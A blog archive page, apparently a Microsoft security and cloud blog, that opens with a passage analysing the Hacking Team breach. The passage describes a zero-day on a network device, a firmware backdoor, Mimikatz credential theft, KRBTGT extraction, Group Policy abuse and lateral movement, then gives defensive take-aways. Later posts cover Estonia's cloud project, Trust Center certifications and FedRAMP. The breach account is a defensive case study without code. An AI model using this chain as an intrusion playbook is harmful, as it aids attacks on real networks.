The breach had a great negative impact on the Hacking team’s business as it exposed some highly confidential business information on Hacking Team’s relationship with its customers, along with financial data and sensitive Intellectual Property such as the Zero-day vulnerabilities used by company to infect its customers’ targets.

The Devil is in the details

The attackers’ report sheds light on their specific Tactics, Techniques and Procedures (TTPs):

  1. External network Reconnaissance: The attacker discovered internet facing network devices, including a vulnerable embedded network device
  2. Internal network access: The attacker exploited a zero-day vulnerability in an embedded network device to update its firmware. The updated firmware included:
    1. A backdoor that enabled the attacker to access hacking team internal network with no need to re-use the zero-day vulnerability each time.
    2. Various hacking tools, allowing the attacker to further attack the internal network. Most notably, the inclusion of a SOCKS proxy allowed the attacker to launch internal network attacks from tools hosted on a computer in the internet.
  3. Internal Network Reconnaissance: Using the NMAP scanner (one of the tools in the updated firmware) attackers found a Network-attached storage (NAS) server, which allowed an unauthenticated access to its contents.
  4. Compromised credentials: With its SOCKS proxy, the attacker was able to remotely load the disk of the Exchange email server backed up on NAS server. In the safety of its external machine the attacker analyzed the disk using some forensic tools to discover a password of a domain user, which is a local administrator on the Exchange Server.
  5. Domain admin compromised credentials: With the compromised local administrator credentials the attacker was able to logon to the Exchange server, and download all emails. Using the Mimikatz tool, the attacker was able to extract additional credentials from the Exchange server memory, including the domain admin credentials (depicted below).
    Figure 1 Compromised Credentials found on the Exchange Server
  6. Domain dominance: Using the domain admin credentials the attacker was able to extract additional keys from the Active Directory (AD) server, including the powerful KRBTGT key to gain persistence over the victim’s domain. Additionally, the attacker abused the Group Policy central configuration mechanism, served from the AD server, in order to weaken a specific computer firewall configuration.
  7. Lateral movement: with the omnipotent Domain Admin credentials the attacker was able to remotely (via SOCKS proxy) copy all machines hard disks.
    However, Hacking Team’s source code resided on a segregated network. Therefore, the attacker needed to move to the computer of the network admin that had access to it. Using the WMI protocol (after disabling restrictive personal firewall settings with a rogue Group Policy update) the attacker gained access to that computer and obtained access to the source code.
  8. Exfiltration: The attacker sent the data through the internet, as the network admin machine was directly connected to the internet.
    Figure 2 Attackers Posted Screenshots on the Hacking Team’s Hijacked Twitter Account, Depicting the Network Admin Desktop During Exfiltration

Key Take-Aways

  • Assume breach: Once more we are reminded that defenders need to develop an “assume breach” mentality. Perimeter defenses will always fail in the case of a dedicated attacker – every embedded device, server, application, end point or user is an attack surface. Eventually one of them will have a vulnerability or be misconfigured.
    Therefore, companies must rebalance their security portfolio to put emphasis on their internal network defense.
  • Attackers Modus Operandi is to use compromised credentials: The attackers used compromised credentials to gain network persistence and move laterally within the network to reach to their destination from the initial infection point. Therefore, the defensive side needs to focus on protecting the identity of its users and other accounts (computers, services, etc.). Such protection can be applied by detecting anomalous usage of accounts and applying Multi-Factor Authentication (MFA).
  • Attackers Modus Operandi is NOT to use malware: Throughout their report, the attackers emphasize they refrain from leaving marks on disk. To do so, they:
    • Operate from the memory of rarely bootable servers to achieve disk-less persistency.
    • Install the exploit on embedded network device that cannot be scanned by traditional anti-malware solutions
    • Use internal network proxies to host their tools over the internet, away from the reach of anti-malware solutions and tunnel their attack through the network.
  • Protecting the Identity Management (IDM) system is pivotal: By using compromised Domain Administrator credentials, the attackers accessed the victim’s IDM system, Active Directory, to obtain additional keys, including the powerful KRBTGT key to gain persistence over the victim’s domain. With the same compromised credentials, attackers abused the Group Policy central configuration mechanism, served from the AD server, in order to weaken a specific computer configuration. Therefore, the defensive side must not only keep their Active Directory hygiene by regular patching and hardening, but also consider its monitoring. This is prudent guidance to follow for any identity management system, not limited to Active Directory.
  • Cloud migration: Some of the attack avenues exploited by the attacker, could have been blocked with some proper configuration and patching. However, migrating to a properly managed cloud based Service (SaaS) can relieve IT from taking care of such chores, reduce the organization’s attack surface and thus improve its security posture.  It would have been much more difficult access the backups and the server infrastructure which would helped prevent this breach.


Categories: Cloud Computing, cybersecurity Tags:

Estonia leading the way in driving digital continuity for government services

May 24th, 2016 No comments

We are at the threshold of unprecedented value creation for industry and society, driven by the accelerating pace of change enabled through digital technology. Whether it is about bringing together patient records so they can be shared quickly for better patient outcomes, or reimagining connectivity and predictive maintenance for cars to meet the expectations of road safety, digital transformation is changing how we work and live.

Called the Fourth Industrial Revolution, this significant disruption of traditional industries is fueled by speed, the falling cost of technology and how quickly companies are growing. There is broad agreement that the economic opportunity from digital transformation could be as high as $100 trillion across all industries over the next decade. But this impact is broader than economics alone. For instance, Governments must also consider the unique role they play in communities – literally holding the keys to the city, powering the grids, administering the most critical public systems. And it’s not just about implementing this or that technology to improve services, but building digital resilience to minimize interruption. Estonia is a great example of a government reinventing its systems. Microsoft is a proud partner.

Long considered a member of the Public Sector “Digital Masters,” Estonia continuously demonstrates a transformative vision. From embracing incubation and innovation, to trying out new ideas in a thoughtful, bold and measured way, stuff happens first in Estonia.

After exploring the broad concept of a digital “data embassy” (the focus of a joint Phase I research project), Estonia and Microsoft were interested in advancing strategic Information and Communications Technology (ICT) principles around “digital continuity.” In the face of natural or man-made interference, could cloud capabilities enhance digital resilience of government services? The Estonian Chief Information Officer and Microsoft set the course to find out.

In the process of this joint research project, we chose to evaluate the technical and policy aspects of “failing over” a critical government service in Microsoft Azure in the event of a disruption – part of a core element of meeting the needs of an advanced digital society and innovative government. Microsoft and the Estonian Ministry of Economic Affairs and Communications assessed the Estonia Land Register, the official digital record of land ownership in Estonia. Could the records be migrated to, and hosted on, the Microsoft Azure cloud computing platform? What technical and policy questions needed to be considered? Today, we published a video and our Proof of Concept findings in a Summary Report.

The Summary Report concludes with six recommendations for any government considering cloud computing. We continue to evaluate some of the harder questions about the operational requirements needed to support effective migration to and how to build trust in the public cloud.

Microsoft is delighted to participate in, learn from, and co-lead research projects such as this one, with the Estonia CIO and team. Public-private partnerships can advance digital transformation for governments, in turn, helping them better serve their citizens, empower their employees, optimize operations and transform their societies.

Categories: Cloud Computing, cybersecurity Tags:

Microsoft Trust Center adds new cloud services and certifications

The Microsoft Trust Center is expanding, and today we’re adding more of our enterprise cloud services—Microsoft Commercial Support, Microsoft Dynamics AX, and Microsoft Power BI. These services join Microsoft Azure, Microsoft Dynamics CRM Online, Microsoft Intune, and Microsoft Office 365 into the Trust Center.

Additionally, we are adding two new compliance attestations, ENS in Spain and FACT in the UK. These two new certifications, added to those announced in March—CS Mark in Japan and MPAA— bring our total to 37—the most comprehensive of any major cloud service provider in the world.

We launched the Trust Center in November 2015 to create a central point of reference for cloud trust resources and to detail our commitments to security, privacy and control, compliance, and transparency. It is here that we document our adherence to international and regional compliance certifications and attestations, and lay out the policies and processes that Microsoft uses to protect your privacy and your data. Here, too, you’ll find descriptions of the security features and functionality in our services as well as the policies that govern the location and transfer of the data you entrust to us.

The new Microsoft compliance certifications and attestations include:

  • ENS. The Esquema Nacional de Seguridad (National Security Framework) in Spain provides ICT security guidance to public administrations and service providers. Microsoft was the first cloud service provider to receive the ENS certification—for Azure and Office 365.
  • FACT. The Federation Against Copyright Theft in the UK developed a certification scheme based on ISO 27001 that focuses on physical and digital security to protect against the theft of intellectual property. Azure was the first multitenant public cloud to achieve FACT certification.
  • MPAA. Azure was the first hyperscale cloud provider to comply with the Motion Picture Association of America guidance and control framework for the security of digital film assets.
  • CS Mark. The Cloud Security Mark is the first security standard for cloud service providers in Japan. Microsoft achieved a CS Gold Mark for all three service classifications: Azure for IaaS and PaaS, and Office 365 for SaaS.

The Trust Center website reflects the principles that underpin our products and services:

  • Security. Get an overview of how security is built into the Microsoft Cloud from the ground up, with protection at the physical, network, host, application, and data layers so that our online services are resilient to attack.
  • Privacy and control. Get visibility into our datacenter locations worldwide, data access policies, and data retention policies, backed with strong contractual commitments in the Microsoft Online Services Terms.
  • Compliance. Here you’ll find comprehensive information on Microsoft Cloud certifications and attestations such as EU Model Clauses, FedRAMP, HIPAA, ISO/IEC 27001 and 27018, PCI-DSS, and SOC 1 and SOC 2. Each compliance page provides background on the certification, a list of compliant services, and detailed information such as implementation guides and best practices.
  • Transparency. The Microsoft Cloud is built on the premise that for you to control your customer data in the cloud, you need to understand as much as possible about how that data is handled. You’ll find a summary of the policies and procedures here.

Visit the Microsoft Trust Center.

Categories: Cloud Computing Tags:

Microsoft Trusted Cloud Security Summit

April 13th, 2016 No comments

Earlier this month, Microsoft hosted its third Trusted Cloud Security Summit in Washington DC. The event brought together a wide range of security stakeholders from the different Microsoft cloud offerings and over a 100 federal department and agency participants, particularly those looking to adapt the FedRAMP High baseline, such as the Department of Homeland Security, Federal Bureau of Investigations, Department of Justice, State Department, the Treasury and the Food and Drug Administration, amongst others. The interest in the event reflected the broader US government prioritization of cybersecurity, which was underlined by the announcement made by President Obama in February, introducing the new Cybersecurity National Action Plan.

Ensuring the security of government agencies using cloud technologies follows a similar vein and has been central to the government since the introduction of the Cloud First policy in 2011. The Federal Risk and Authorization Management Program, better known as FedRAMP, was developed shortly thereafter and has for a number of years served as a process which provides a standardized, government-wide approach to security assessment, authorization, and continuous monitoring for cloud services. The original process supported migration of low and moderate impact workloads to the cloud and has helped many government agencies make that critical move. However, that has not been the case for some of the more critical services.

The FedRAMP High baseline aims to provide a higher categorization level for confidentiality, integrity and availability of cloud services; i.e. for those considered critical to government operations. While the High baseline addresses only 20% of government information and systems, it comprises over 50% of federal IT spend, reflecting a significant cost savings potential when migrating these workloads to the cloud. The pilot we participated in represented the last step in a year-long effort to develop the High baseline. The draft baseline has already been through two rounds of public comment and review from a Tiger Team from across multiple federal agencies.

Since FedRAMP was established, Microsoft has worked closely with the FedRAMP program management office to ensure our Federal cloud solutions meet or exceed public sector security, privacy and compliance standards. Our March Summit established that this has not changed, as it confirmed Microsoft as one of only three cloud service providers to be included in the FedRAMP High Baseline pilot and was on that point on track to achieve the appropriate level. Building on the FedRAMP authorization, Azure Government is also on track to achieve the DISA Level 4 authorization shortly, covering unclassified data that requires protection against unauthorized disclosure or other mission-critical data (i.e. controlled unclassified data).

The event itself, examined the development process of the FedRAMP High Baseline, as well its impact on federal cloud adoption. Matt Goodrich, Director for FedRAMP in GSA’s Office of Citizen Services and Innovative Technologies (OCSIT) talked about how the revision of the process will benefit both providers and the government, for example by limiting the certification time and providing more transparency, predictability and risk focus upfront through a focus on core capabilities instead of an exclusively controls-centric approach.

The Summit also served to examine some of Microsoft’s security capabilities that address other federal government cloud security priorities, including DOD’s FedRAMP+ and DHS’s Trusted Internet Connections programs. While both initiatives leverage the original FedRAMP process, they augment unique requirements for providers to demonstrate additional levels of assurance and operational visibility- capabilities that Microsoft’s cloud offerings can meet today.

For more on the security announcement made by Azure on the day, take a look at Matt Rathbun’s (Cloud Security Director, Azure) blog here.

Categories: Cloud Computing Tags: